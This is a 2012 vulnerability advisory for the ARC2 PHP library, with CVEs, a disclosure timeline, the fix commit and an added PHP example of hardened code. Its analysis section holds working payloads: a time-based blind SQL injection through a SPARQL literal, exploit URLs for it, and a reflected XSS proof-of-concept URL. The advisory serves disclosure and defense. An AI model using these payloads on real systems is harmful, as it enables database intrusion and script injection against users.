Simone "negator" Onofri and Luca "beinux3" Napolitano found multiple issues in ARC2, a library that provides RDF and SPARQL functionality to PHP applications and uses MySQL as its backend. The vulnerabilities found include SQL Injection and XSS.
ARC v2011-12-01 Multiple vulnerabilities

Name              ARC2 v2011-12-01 Multiple vulnerabilities
Systems Affected  ARC2 v2011-12-01
Severity          High
Impact            High 10/10, vector (AV:N/AC:L/Au:N/C:C/I:C/A:C)
Vendor            https://github.com/semsol/arc2
Advisory          http://www.ush.it/team/negator/hack-arc_2011-12-01/adv.txt
Author            Simone "negator" Onofri, Luca "beinux3" Napolitano
Date              20121123

I. BACKGROUND

ARC is a flexible RDF system for semantic web and PHP practitioners. It's free, open-source, easy to use, and runs in most web server environments.

II. DESCRIPTION

ARC version v2011-12-01 and lower is affected by Blind SQL Injection and Cross Site Scripting vulnerabilities, in particular in the SPARQL+ Endpoint.

III. ANALYSIS

Summary:

A) Blind SQL Injection (SQLI) Vulnerability
B) Reflected Cross Site Scripting (XSS) Vulnerability

A) Blind SQL Injection (SQLI) Vulnerability

A blind SQL Injection vulnerability exists in ARC version v2011-12-01.

ARC stores triples in a MySQL database and uses a translator from SPARQL to SQL. To make debugging of the application easier, the developer has included SQL comments that contain the query string values. It's possible to inject SQL commands through these comments when the data is passed in a SPARQL WHERE clause.

In the "getTriplePatternSQL()" function of the "ARC2_StoreSelectQueryHandler.php" file, the query sent to MySQL is automatically annotated for debugging (without any way to conditionally disable this feature) by plugging in comments containing the pattern's "S P O" (Subject, Predicate, Object; the semantic web triple concept) values. Since the values are placed in a block comment verbatim, a value containing the comment terminator "*/" closes the comment early and the rest of the value is parsed as SQL.

SPARQL Query:

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
PREFIX iam: <http://x>
SELECT * WHERE {
   ?user iam:user "lol*/ OR (SELECT sleep(5))=1--" .
} LIMIT 100
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

Actual MySQL Query:

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
SELECT T_0_0_0.s AS `user`, T_0_0_0.s_type AS `user type`
FROM arc_tests_triple T_0_0_0
WHERE (T_0_0_0.p = 0) /*FIX-IT http://xuser */
  AND (T_0_0_0.o = 0) /*FIX-IT lol*/ OR (SELECT sleep(5))=1-- */
LIMIT 0,100
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

What follows is a demo exploitation of the SPARQL Endpoint.

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
$query = 'PREFIX iam: <http://x>
SELECT * WHERE {
   ?user iam:user "lol*/ OR (SELECT sleep(5))=1--" .
   ?password iam:hasPassword "password" .
} LIMIT 100';

$store->setUp();
$store->query($query, 'rows');
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

It's possible to exploit the issue in the standard blind way, for example using TRUE/FALSE statements (tautology).

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
http://www.example.com/end_point.php?query=PREFIX+iam%3A+<http%3A%2F%2Fx>%0D%0ASELECT+*+WHERE+%7B%0D%0A+++%3Fuser+iam%3Auser+"lol*%2F+OR+%28SELECT+sleep%285%29%29%3D1--".%0D%0A%7D%0D%0ALIMIT+1&output=&jsonp=&key=&show_inline=1
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

The CVSS v2 score for Blind SQL Injection is: High 10/10, vector (AV:N/AC:L/Au:N/C:C/I:C/A:C).

B) Reflected Cross Site Scripting (XSS) Vulnerability

A Reflected Cross Site Scripting vulnerability exists in the endpoint function of ARC version v2011-12-01.

The GET variable "query" is reflected in the page without proper encoding when the "output" option is set to "htmltab".

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
<div class="results">
Could not properly handle "<script src=/lol.it/x><script>" in ARC2_SPARQLPlusParser
</div>
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

PoC URL that exploits this vulnerability:

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
http://www.example.com/end_point.php?query=<script+src%3D%2Flol.it%2Fx><script>&output=htmltab&jsonp=&key=&show_inline=1
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

The CVSS v2 score for Reflected Cross Site Scripting is: Medium 4.3/10, vector (AV:N/AC:M/Au:N/C:N/I:P/A:N).

IV. DETECTION

ARC2 v2011-12-01 and possibly earlier versions are vulnerable.

V. WORKAROUND

Update ARC2 to the latest release, or manually fix "ARC2_StoreEndpoint.php" and the other files as described by commit ID 0a39922edaf6a72c5af60aaeaff7bc4e92a6d342.

https://github.com/semsol/arc2/commit/0a39922edaf6a72c5af60aaeaff7bc4e92a6d342

VI. VENDOR RESPONSE

Issues fixed in GIT commit 0a39922.

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned:

- The name CVE-2012-5872 to the Blind SQL Injection Vulnerability.
- The name CVE-2012-5873 to the Reflected Cross Site Scripting Vulnerability.

This is a candidate for inclusion in the CVE list http://cve.mitre.org, which standardizes names for security problems.

VIII. DISCLOSURE TIMELINE

20121110  Bug discovered
20121110  Vendor contacted
20121111  Vendor responded
20121111  Vendor fixed SQLI
20121115  Vendor fixed XSS
20121115  Advisory release scheduled for 20121123
20121123  Advisory released

IX. REFERENCES

Well you know what SQLi and XSS are, right?

X. CREDIT

Simone "negator" Onofri is credited for the discovery of this vulnerability.
Luca "beinux3" Napolitano is credited for the discovery of this vulnerability.

Thanks to Francesco "ascii" Ongaro for revision and fine editing.

Simone "negator" Onofri
web site: http://simone.onofri.net/
mail: simone AT onofri DOT net

Luca "beinux3" Napolitano
web site: http://www.network-tsunami.com/
mail: beinux3 AT gmail DOT com

Francesco "ascii" Ongaro
web site: http://www.ush.it/
mail: ascii AT ush DOT it

XI. LEGAL NOTICES

Copyright (c) 2012

Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without my express written consent. If you wish to reprint the whole or any part of this alert in any medium other than electronically, please email me for permission.

Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
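As an added illustration (not code from ARC2, from the vendor's fix commit, or from the advisory authors), the PHP snippet below isolates the two patterns described in section III: a triple-pattern value interpolated into a SQL block comment (III.A) and the "query" parameter echoed into the htmltab error message (III.B), each beside a hardened form. The function names, the "FIX-IT" comment layout and the neutralisation strategy (replacing the comment terminator rather than removing values from the query) are this example's own choices and should not be read as a description of the actual patch.

```php
<?php
declare(strict_types=1);

// Added example, not ARC2 code. It reproduces, in isolation, the two shapes
// the advisory describes and contrasts each with a hardened form.

/**
 * III.A, vulnerable shape: the raw SPARQL pattern value is dropped into a
 * SQL block comment. Inside such a comment MySQL only cares about the
 * star-slash terminator; a value containing it closes the comment early
 * and everything after it is parsed as live SQL.
 */
function debugCommentUnsafe(string $value): string
{
    return '/*FIX-IT ' . $value . ' */';
}

/**
 * Hardened shape (this example's own mitigation): break every star-slash
 * sequence in the value with a space before it enters the comment. The
 * replacement can never re-form a terminator because it never yields a
 * star directly followed by a slash, so the comment always ends where the
 * generator put its own terminator.
 */
function debugCommentSafe(string $value): string
{
    $neutral = str_replace('*/', '* /', $value);
    return '/*FIX-IT ' . $neutral . ' */';
}

/**
 * Sanity check for a generated fragment: exactly one comment opener, exactly
 * one terminator, and the opener comes first. The unsafe fragment built from
 * the advisory's payload fails this because the payload adds a second
 * terminator of its own.
 */
function hasSingleClosedComment(string $sql): bool
{
    return substr_count($sql, '/*') === 1
        && substr_count($sql, '*/') === 1
        && strpos($sql, '/*') < strpos($sql, '*/');
}

/** III.B, vulnerable shape: the query parameter is reflected verbatim. */
function renderParseErrorUnsafe(string $query): string
{
    return '<div class="results">Could not properly handle "' . $query
        . '" in ARC2_SPARQLPlusParser</div>';
}

/** Hardened shape: HTML-encode the reflected value, quotes included. */
function renderParseErrorSafe(string $query): string
{
    $escaped = htmlspecialchars($query, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<div class="results">Could not properly handle "' . $escaped
        . '" in ARC2_SPARQLPlusParser</div>';
}

// Demonstration using the two values quoted in the advisory.
$sqlValue = 'lol*/ OR (SELECT sleep(5))=1--';
$xssValue = '<script src=/lol.it/x><script>';

$fragments = [
    'unsafe' => debugCommentUnsafe($sqlValue),
    'safe'   => debugCommentSafe($sqlValue),
];
foreach ($fragments as $label => $fragment) {
    printf("%-6s %s\n       single closed comment: %s\n",
        $label, $fragment, hasSingleClosedComment($fragment) ? 'yes' : 'no');
}

echo renderParseErrorUnsafe($xssValue), "\n";
echo renderParseErrorSafe($xssValue), "\n";
```

Run with `php example.php`: the unsafe SQL fragment reproduces the `/*FIX-IT lol*/ OR (SELECT sleep(5))=1-- */` shape from the advisory and fails the single-comment check, while the hardened fragment keeps the whole value inside one comment. For the XSS case the encoded output renders the script tag as text instead of markup. The more robust design is the one the check hints at: keep user-controlled text out of the SQL string entirely and log debugging details elsewhere, so that no escaping rule has to be remembered per call site.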